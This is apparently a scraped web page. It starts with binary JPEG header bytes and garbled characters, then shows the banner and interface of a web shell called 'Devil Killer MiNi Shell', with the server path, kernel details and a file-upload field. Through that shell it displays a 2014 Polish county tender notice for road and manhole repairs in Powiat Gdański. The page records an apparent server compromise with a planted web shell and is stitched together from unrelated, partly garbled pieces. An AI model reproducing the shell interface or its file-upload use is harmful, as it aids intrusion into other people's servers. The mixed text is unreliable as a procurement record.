JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140130/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140130/19361-N-2014.html

<p class="kh_header"><b>Pruszcz Gdański: Wykonanie   robót    związanych    z    wykonaniem:   remontu cząstkowego nawierzchni bitumicznych, remontu nawierzchni i    elementów     ulic    oraz    regulacją   włazów    i    wpustów kanalizacyjnych położonych na terenie Powiatu Gdańskiego.</b><br>
<b>Numer ogłoszenia: 19361 - 2014; data zamieszczenia: 30.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Gdański z siedzibą w Pruszczu Gdańskim reprezentowany przez Zarząd Powiatu Gdańskiego , ul. Wojska Polskiego 16, 83-000 Pruszcz Gdański, woj. pomorskie, tel. 058 6834999, faks 058 6834899.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat-gdanski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie   robót    związanych    z    wykonaniem:   remontu cząstkowego nawierzchni bitumicznych, remontu nawierzchni i    elementów     ulic    oraz    regulacją   włazów    i    wpustów kanalizacyjnych położonych na terenie Powiatu Gdańskiego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem  zamówienia jest: Wykonanie robót związanych z wykonaniem: remontu cząstkowego nawierzchni bitumicznych,  remontu nawierzchni i elementów ulic oraz regulacją  włazów   i   wpustów   kanalizacyjnych   położonych   na   terenie  Powiatu Gdańskiego. 

2.Zakres przedmiotu zamówienia:
  Prace remontowe zostaną wykonane w ramach 3 zadań:
1) Zadanie nr 1  - Wykonanie  remontu  cząstkowego nawierzchni  bitumicznych   dróg  powiatowych położonych na terenie Powiatu Gdańskiego, o  łącznej  powierzchni  do  8.000 m2 .
Wykonanie remontu cząstkowego nawierzchni bitumicznych, przy użyciu masy  mineralno - bitumicznej średnioziarnistej zamkniętej wg Polskiej Normy (powierzchnia do 8.000 m2)  oraz wyrównanie podbudowy przy wybojach o głębokości ponad 4 cm mieszanką mineralno - asfaltową wyrównawczą (do 480 ton) na sieci dróg powiatowych, Powiatu Gdańskiego.	
Prace odbywać się będą na sieci dróg powiatowych Powiatu Gdańskiego. Kolejność dróg do remontu zostanie wskazana po podpisaniu umowy z wybranym Wykonawcą - zgodnie z postanowieniami zawartymi we wzorze umowy, który stanowi zał. nr 5 A do niniejszej specyfikacji. Wykaz dróg powiatowych, stanowi załącznik nr 11 do niniejszej specyfikacji. Wskazanie miejsc do remontu nastąpi bezpośrednio przed przystąpieniem do realizacji  robót.
a) realizacja przedmiotu zamówienia odbywać się będzie przy pomocy minimum dwóch grup pracowniczych wybranego Wykonawcy, które wykonywać będą przedmiot zamówienia równolegle w czasie, w dwóch różnych częściach powiatu (szczegóły ustalone będą z wybranym Wykonawcą),  
b) przycięcie   nawierzchni   wokół   uszkodzonego   miejsca   z  nadaniem łacie regularnych kształtów,
c) wyfrezowanie lub wykucie uszkodzonego miejsca z oczyszczeniem, usunięciem oraz   utylizacją rumoszu,
d) skropienie naprawianego miejsca oraz posmarowanie krawędzi emulsją asfaltową,
e) wypełnienie   odpowiednią  mieszanką   mineralno - bitumiczną  łaty z zagęszczeniem do poziomu otaczającej  płaszczyzny nawierzchni,
f) oznakowanie drogi w miejscu wykonywania remontu zgodnie z projektem sporządzonym na podstawie Rozporządzenia  Ministra  Infrastruktury  z  dnia  23.09.2003 r.  w  sprawie szczegółowych  warunków  zarządzania  ruchem  na drogach oraz wykonywania nadzoru nad tym zarządzaniem (Dz. U. z 2003 r., Nr 177, poz. 1729), 
g) wyrównanie   podbudowy   przy   wybojach   o   głębokości    ponad    4   cm    mieszanką  mineralno -  asfaltową wyrównawczą (szacunkowa ilość: do 480 ton) 
h) ubytki  o  powierzchni   mniejszej   od   1   m2    stanowią  ok.  30 %  ogólnej powierzchni  stanowiącej  przedmiot zamówienia.
2) Zadanie  nr  2  -Remont nawierzchni  i  elementów ulic  (z prefabrykowanych  
 elementów   betonowych)    dróg    powiatowych    położonych    na   terenie   Powiatu Gdańskiego.
Remont polegający na naprawie  nawierzchni i elementów ulic z prefabrykowanych elementów betonowych (betonowej kostki brukowej, płytek betonowych itp.), wszelkiego rodzaju zapadnięć, zagłębień i ubytków na nawierzchniach, przełożeniem  i wymianą elementów ulic oraz uzupełnieniem podbudów. Prace odbywać się będą na sieci dróg powiatowych Powiatu Gdańskiego. Kolejność dróg do remontu zostanie wskazana po podpisaniu umowy z wybranym Wykonawcą - zgodnie z postanowieniami zawartymi we wzorze umowy, który stanowi zał. nr 5B do niniejszej specyfikacji. Wykaz dróg powiatowych, stanowi załącznik nr 11 do niniejszej specyfikacji. Wskazanie miejsc do remontu nastąpi bezpośrednio przed przystąpieniem do realizacji  robót.

3) Zadanie   nr   3 -    Regulacja     zapadniętych     i     uszkodzonych    włazów    studni kanalizacyjnych  i  wpustów  deszczowych  w ciągu dróg powiatowych położonych na terenie Powiatu Gdańskiego.

Regulacja pionowa i pozioma włazów studni kanalizacyjnych i wpustów deszczowych wszystkich rodzajów zapadnięć, pęknięć z uzupełnieniem ubytków. Prace odbywać się będą na sieci dróg powiatowych Powiatu Gdańskiego. Kolejność dróg do remontu zostanie wskazana po podpisaniu umowy z wybranym Wykonawcą - zgodnie z postanowieniami zawartymi we wzorze umowy, który stanowi zał. nr 5B do niniejszej specyfikacji. Wykaz dróg powiatowych, stanowi załącznik nr 11 do niniejszej specyfikacji. Wskazanie miejsc do remontu nastąpi bezpośrednio przed przystąpieniem do realizacji  robót.
3. Szczegółowy opis przedmiotu zamówienia zawarty jest w:
- opisie  przedmiotu  zamówienia,  specyfikacji  technicznej  wykonania  i  odbioru  robót  budowlanych (zał. nr 12 do SIWZ).
 4. Zamawiający zastrzega sobie możliwość zmiany ilości poszczególnych pozycji w formularzach cenowych w zależności od potrzeb bieżących przy zachowaniu ogólnej kwoty umownej (dotyczy zadania 2 i 3).
5. Zamawiający  dopuszcza zatrudnienie podwykonawcy/podwykonawców.
6. W przypadku zatrudnienia podwykonawcy/podwykonawców, w oparciu o art. 36 ust. 4 Ustawy Zamawiający żąda wskazania przez Wykonawcę w ofercie części zamówienia, których wykonanie zamierza powierzyć podwykonawcom. Do oferty należy załączyć informację na ten temat (wzór zał. nr 9 do SIWZ). 
7.Do zawarcia umowy przez Wykonawcę  z Podwykonawcami jest wymagana pisemna zgoda Zamawiającego pod rygorem nieważności. Wprowadzenie na budowę  Podwykonawcy bez zgody Zamawiającego może skutkować  rozwiązaniem umowy z winy Wykonawcy. Umowy pomiędzy Wykonawcą i Podwykonawcami muszą być dostarczone do Zamawiającego przed rozpoczęciem przez Podwykonawców robót i zawierać  przedmiot i zakres robót jakie wykona Podwykonawca, ich wartość, termin płatności co najmniej o 7 dni wcześniejszy niż terminy płatności Zamawiającego na rzecz Wykonawcy, wskazanie konta bankowego Podwykonawcy, zapis iż Podwykonawca po otrzymaniu wynagrodzenia zobowiązany jest do niezwłocznego złożenia oświadczenia podpisanego przez osobę upoważnioną, o otrzymaniu należnego wynagrodzenia od Wykonawcy (Wykonawca dostarczy oświadczenie Zamawiającemu), zapis iż niedochowanie terminu płatności na rzecz Podwykonawcy przez Wykonawcę i brak dostarczenia oświadczenia, o którym mowa powyżej  w terminie do 5 dni przed terminem płatności Zamawiającego na rzecz Wykonawcy, skutkuje automatyczną cesją wynagrodzenia należnego Wykonawcy od Zamawiającego na rzecz Podwykonawcy w wysokości odpowiadającej wynagrodzeniu Podwykonawcy. 
8.Niedochowanie terminu płatności  na  rzecz  Podwykonawcy  przez  Wykonawcę  i  brak oświadczenia, o którym mowa w pkt. 6 spowoduje przelanie przez Zamawiającego wynagrodzenia należnego Wykonawcy na rzecz Podwykonawcy, do wysokości wynagrodzenia należnego Podwykonawcy od Wykonawcy. 
9.Kwestie dotyczące podwykonawców określa wzór umowy -(zał. nr 5A,5B,5C do SIWZ).
10. Zamawiający dopuszcza rozwiązania równoważne opisywane  w  specyfikacji technicznej  wykonania  i odbioru   robót   -   w    zakresie   wskazanych   norm/aprobat/specyfikacji  technicznych/ systemów  odniesienia. Wykonawca,  który  powołuje  się  na  rozwiązania równoważne opisywanym przez Zamawiającego, jest obowiązany wykazać, że oferowane przez  niego  dostawy,  usługi  lub  roboty  budowlane spełnią wymagania określone przez  Zamawiającego.
11. W   trakcie   prowadzenia    robót    należy    przestrzegać    przepisów    BHP    zawartych    w  Rozporządzeniu Ministra Infrastruktury z dnia 6 lutego 2003 roku (Dz. U. z 2003 roku, Nr 47 poz. 401)  w  sprawie  bezpieczeństwa i  higieny pracy podczas wykonywania robót budowlanych..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zgodnie z  art. 36  ust. 2, pkt. 3 ustawy, Zamawiający  przewiduje  możliwość  udzielenia w okresie trwania umowy ewentualnych zamówień uzupełniających w trybie z wolnej ręki, których wartość nie przekroczy 50% wartości zamówienia podstawowego, na zasadach określonych w art. 67 ust. 1 pkt. 6 ustawy PZP.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.31.42-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Wadium wnosi się przed upływem terminu składania ofert.
2.Wykonawca zobowiązany jest do wniesienia wadium w wysokości 10.000,00 zł(słownie: dziesięć tysięcy złotych 00/100 ) dla zadania nr 1,  dla zadania nr 2 i 3 w wysokości 1.200,00 zł (słownie: tysiąc dwieście złotych 00/100) najpóźniej w dniu składania ofert przed godz. 11.30 dnia 18.02.2014 r. W przypadku jeżeli do godz. 11:30 dnia 18.02.2014 r. nie wpłynie wymagana kwota wadium na konto Zamawiającego, będzie to oznaczało, że wadium nie zostało wniesione.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni  warunek za spełniony, gdy Wykonawcy wykażą się prowadzeniem działalności gospodarczej w zakresie robót budowlanych drogowych.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni  warunek za spełniony, gdy Wykonawcy wykażą się wykonaniem w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy  -  tym okresie, minimum 2 robót budowlanych - drogowych, odpowiadających swym rodzajem i wartością robotom stanowiącym przedmiot zamówienia  (z podaniem ich wartości oraz daty i   miejsca wykonania), o wartości nie mniejszej niż 400.000,00 zł łącznie - dla zadania nr 1, o wartości nie mniejszej niż 50.000,00 zł łącznie - dla zadania nr 2 i 3, oraz załączą dowody dotyczące najważniejszych robót, określających, czy roboty te zostały wykonane  w sposób należyty  oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Do każdego z zadań należy załączyć osobny wykaz wykonanych robót zgodnie z zakresem przedmiotowym poszczególnych zadań (zał. nr 7do SIWZ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>opis sposobu dokonywania oceny spełniania tych warunków:
Zamawiający oceni warunek za spełniony, gdy Wykonawcy złożą oświadczenie (zał. nr 8 do SIWZ), że na dzień rozpoczęcia robót będą dysponować sprzętem niezbędnym do wykonania przedmiotu zamówienia dla zadania nr 1 tj.: 
- wytwórnią mieszanek mineralno - bitumicznych - 1 szt.
- frezarką	 - minimum 2 szt.
- samochodem ciężarowym  - minimum 2 szt.
- skrapiarką (dopuszczalna - ciągniona)- minimum 2 szt. 
- sprężarką z  młotem pneumatycznym - minimum 2 szt.
- walcem 5 tonowym  - minimum 2 szt.
- piłą do cięcia asfaltu - minimum 2 szt.
Dla zadania nr 2 i 3 Zamawiający nie wymaga dokumentów potwierdzających spełnienie tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  oceni   warunek  za  spełniony, gdy Wykonawcy ubiegający się o zamówienie oddelegują w dniu rozpoczęcia robót, do wykonania przedmiotu zamówienia:
- kierownika robót posiadającego aktualne uprawnienia do kierowania robotami drogowymi.
- co najmniej dwie ekipy wykonawcze po minimum 5 osób każda 
W  celu  potwierdzenia  spełnienia  tego  warunku  Wykonawca  zobowiązany  jest wypełnić oświadczenie (załącznik nr 6 do SIWZ(dla zadania nr 1).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni  warunek za spełniony, gdy Wykonawcy ubiegający się o zamówienie:
- posiadają  opłaconą   polisę  ubezpieczeniową   od   odpowiedzialności   cywilnej  (lub  inny   dokument   potwierdzający,   że   Wykonawca   jest   ubezpieczony   od  odpowiedzialności    cywilnej)     w     zakresie     prowadzonej      działalności      gospodarczej,     związanej    z    przedmiotem    niniejszego    zamówienia,    na    wartość   co    najmniej    300.000,00 zł -    dotyczy zadania nr 1.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Formularz ofertowy  (wzór zał. nr 1A,1B,1C do SIWZ),
2.Formularz cenowy (wzór zał. nr 4A,4B,4C do SIWZ),
3.Podpisany wzór umowy wraz z załącznikami (zał. nr 5A wraz z załącznikami 5.1, 5.2, 5.3. - do zad. nr 1 oraz 5B, 5C do SIWZ),
4.Oświadczenie o posiadanym potencjale kadrowym (wzór zał.  nr 6 do SIWZ- dotyczy zad nr 1),
5.Wykaz wykonanych robót (zał. nr 7 do SIWZ),
6.Oświadczenie o posiadanym potencjale technicznym (wzór zał.  nr 8 do SIWZ),
 7. Informacja na temat części zamówienia, których wykonanie  wykonawca zamierza powierzyć podwykonawcom (wzór zał.  nr 9 do SIWZ),
8.Oświadczenie o przynależności do grupy kapitałowej  (zał. nr 10 do SIWZ),
9.Potwierdzenie   wniesienia wadium: potwierdzenie   dokonanego   przelewu lub  oryginał  wraz z potwierdzoną kopią dokumentu stanowiącego wadium.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający zgodnie z art. 144 Ustawy Prawo Zamówień Publicznych przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy, w przypadku wystąpienia  co najmniej jednego ze zdarzeń: 	
a)wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie  mającym  wpływ na realizację przedmiotu zamówienia, w tym zmiany stawki podatku VAT, mające wpływ na wysokość ceny brutto za świadczoną robotę;
   b) gdy warunki atmosferyczne odbiegające od typowych, uniemożliwią  wykonanie  robót budowlanych, przeprowadzenie prób i sprawdzeń oraz dokonywania odbiorów;
  c) zmiany   wskazanych    w    umowie    osób    uprawnionych   do   działania   po   stronie Zamawiającego.
2. W  przypadku  wystąpienia  okoliczności wymienionej w ust. 1 pkt. b), termin realizacji przedmiotu zamówienia może ulec odpowiedniemu przedłużeniu o  czas niezbędny  do   zakończenia   jego   wykonywania  w   sposób  należyty,  nie  dłużej  jednak  niż o  okres trwania tych okoliczności.
3. Wszelkie zmiany umowy wymagają formy pisemnej w postaci aneksu, pod rygorem   nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat-gdanski.pl<br>
